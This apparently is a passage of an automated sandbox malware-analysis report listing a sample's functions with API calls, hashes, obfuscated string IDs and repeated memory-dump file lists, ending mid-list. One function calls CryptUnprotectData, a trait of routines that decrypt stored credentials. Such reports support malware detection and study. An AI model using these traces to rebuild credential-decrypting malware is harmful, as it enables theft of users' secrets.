                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: b5b5dd5b0b3fe97adbfa5fc0eb830724f36b6e6392b5313b1ecffbb1f24ba6fc
                              • Instruction ID: 1f588666e0e7aa56844be5e551cbc3b63a1353ff86c9a833289ad805ac3e7c7d
                              • Opcode Fuzzy Hash: b5b5dd5b0b3fe97adbfa5fc0eb830724f36b6e6392b5313b1ecffbb1f24ba6fc
                              • Instruction Fuzzy Hash: C9118EB1945218EBEB248B54DC49FA9B7B8FB04721F1043AAE90A932C0C7745E40CF51
                              Function 00A408E2 Relevance: 5.4, Strings: 3, Instructions: 1615COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: <_$j-Zw$q5~
                              • API String ID: 0-3291620619
                              • Opcode ID: 298050493758bf2fc3470907fc4fcb0c2caeeddf1a83db20a4b4f862f2a7d2df
                              • Instruction ID: 2150ef86b6c1df8046009e3f48bb00e5b4a3197d7ddf769517f001b71a324460
                              • Opcode Fuzzy Hash: 298050493758bf2fc3470907fc4fcb0c2caeeddf1a83db20a4b4f862f2a7d2df
                              • Instruction Fuzzy Hash: D8B2F7F3A0C2049FE304AE2DEC8567AB7E9EF94720F16493DEAC4C7744E63558058697
                              Function 00693720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(0069E118,00000000,00000001,0069E108,00000000), ref: 00693758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006937B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 85351b00c6201bff14bd830b0ac1531ec71ba7a1086dc264ffdf3033490ea05e
                              • Instruction ID: 0f4ef3e6fc49777d548ae1741628951cd4b0fe33815c94a35db031d025648049
                              • Opcode Fuzzy Hash: 85351b00c6201bff14bd830b0ac1531ec71ba7a1086dc264ffdf3033490ea05e
                              • Instruction Fuzzy Hash: F441D670A40A28AFDB24DB58CC95B9BB7B9BB48702F5041D8A609E72D0D7716E85CF50
                              Function 00689B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00689B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00689BA3
                              • LocalFree.KERNEL32(?), ref: 00689BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: ada9490dcf3bc5cd25617f332b816e108ec848b33719e55b838e03486324a2ff
                              • Instruction ID: 6027b0c97aa491739fdfec5dee9a173ccf9255376a5f5885c03fa9dfc1ea2ed7
                              • Opcode Fuzzy Hash: ada9490dcf3bc5cd25617f332b816e108ec848b33719e55b838e03486324a2ff
                              • Instruction Fuzzy Hash: D911CCB4A00209DFDB04DFA4D985EAE77B5FF88304F104558E915A7350D774AE10CF61
                              Function 00A4DCEF Relevance: 4.0, Strings: 2, Instructions: 1545COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: "{]$vy
                              • API String ID: 0-2703474962
                              • Opcode ID: bc83f0e908aa1c2706a01eb6383b45394ce5acbde0f575e8eb2673fcbf87155b
                              • Instruction ID: 0fd5c5e1707b1a2c0437dabba38ab9d4378d1a37c616dc81460f5e3112a95e23
                              • Opcode Fuzzy Hash: bc83f0e908aa1c2706a01eb6383b45394ce5acbde0f575e8eb2673fcbf87155b
                              • Instruction Fuzzy Hash: ACA2E4F36082049FE3046E2DEC8577AFBE9EF94720F1A493DEAC483744EA7558058697
                              Function 00A2367B Relevance: 4.0, Strings: 3, Instructions: 248COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 7.k$?N&w$TL2
                              • API String ID: 0-4171604338
                              • Opcode ID: 1e6f77e0390bc83c4f23775ccc1b7fe275251a9df23e9060b22de8486beb5201
                              • Instruction ID: 04d49e229ee6fc3762edfd83df0e31cacadc54a3eba9b2006081b21a3f0da8b2
                              • Opcode Fuzzy Hash: 1e6f77e0390bc83c4f23775ccc1b7fe275251a9df23e9060b22de8486beb5201
                              • Instruction Fuzzy Hash: 577148F3E186105BF318993EEC9433BF6D69BD4720F2B853D9A88E3784E8795C064295
                              Function 008F131E Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: '5:
                              • API String ID: 0-366166751
                              • Opcode ID: f2cbd654db54107b8d21636384e912d3778ffd489128c7e78f0cf43189271f1d
                              • Instruction ID: 14a3f57292fd1840c413728726ab148b08eb515707af71ac3fd09f3c9af63886
                              • Opcode Fuzzy Hash: f2cbd654db54107b8d21636384e912d3778ffd489128c7e78f0cf43189271f1d
                              • Instruction Fuzzy Hash: 36612CF3A183109BF700AE2DDC8576ABBD9EF94720F2A493DE6C4C7744E53598048687
                              Function 00A041AC Relevance: .2, Instructions: 220COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e22c9980753f09da86168f17c131d2fd991849e9fdb4c729f0e6b3210ef323a0
                              • Instruction ID: 455068b3423d6ae62f76737016eaefbd24afb6687a74eb4e3301bd6f6eb8e0e3
                              • Opcode Fuzzy Hash: e22c9980753f09da86168f17c131d2fd991849e9fdb4c729f0e6b3210ef323a0
                              • Instruction Fuzzy Hash: 5A61F6F3E082105BF3006A29EC8576ABBD5EB94324F1B463DDBD893380E93A5C1586C6
                              Function 00A2F8D4 Relevance: .2, Instructions: 218COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4f9131258f068bc27ac1af308448ff99d2147a7a33c484137a72089074f0d627
                              • Instruction ID: e927326248322b5cc55a2d01bd46cd36f7c50493bf6f7997e135b681fd7d50a9
                              • Opcode Fuzzy Hash: 4f9131258f068bc27ac1af308448ff99d2147a7a33c484137a72089074f0d627
                              • Instruction Fuzzy Hash: D76139F3E182245BF3586929EC957BAB7D5DB94760F1B453EEB8853780E93E0C0142C5
                              Function 009AFE3E Relevance: .2, Instructions: 167COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3d7c97fa4f548b8c81694a4092ec58f9baeb63c5e42d80f63f16c1040b978e1d
                              • Instruction ID: 9e3400db71e60bbf4fa05687ba0106ee74163bea7526376dd4e4f4f94030de93
                              • Opcode Fuzzy Hash: 3d7c97fa4f548b8c81694a4092ec58f9baeb63c5e42d80f63f16c1040b978e1d
                              • Instruction Fuzzy Hash: E7412BF3E482148BE304593EEC94776BADAE7D4730F6B823DE99857788DC761C064191
                              Function 0097B017 Relevance: .1, Instructions: 138COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 814265e82b39b62dae95ce0239908d795cb2bccb2c31a0463becf8003ebdec65
                              • Instruction ID: 24409989235a5a9bdcd3b34c315eb2e86acb264dd28089c1aa9166503435ae88
                              • Opcode Fuzzy Hash: 814265e82b39b62dae95ce0239908d795cb2bccb2c31a0463becf8003ebdec65
                              • Instruction Fuzzy Hash: 9F4114B350C724AFE3146E69EC857BAF7D4EF84720F1A8A3EDA8597680E574080086D6
                              Function 00959DF4 Relevance: .1, Instructions: 97COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a8f4d86a902d8e0ca895b336c70e24950d9def0b9ded82654e92738c108c80f5
                              • Instruction ID: 6f8ddf709a099bc61c212beeb59b0fa8d61af370d7dbb3da1dea6c6951a79436
                              • Opcode Fuzzy Hash: a8f4d86a902d8e0ca895b336c70e24950d9def0b9ded82654e92738c108c80f5
                              • Instruction Fuzzy Hash: F93127E391831C5BE7586E6CDC9932FB688AB14310F1E463D9ACA87B84FD695D0443C6
                              Function 00699750 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
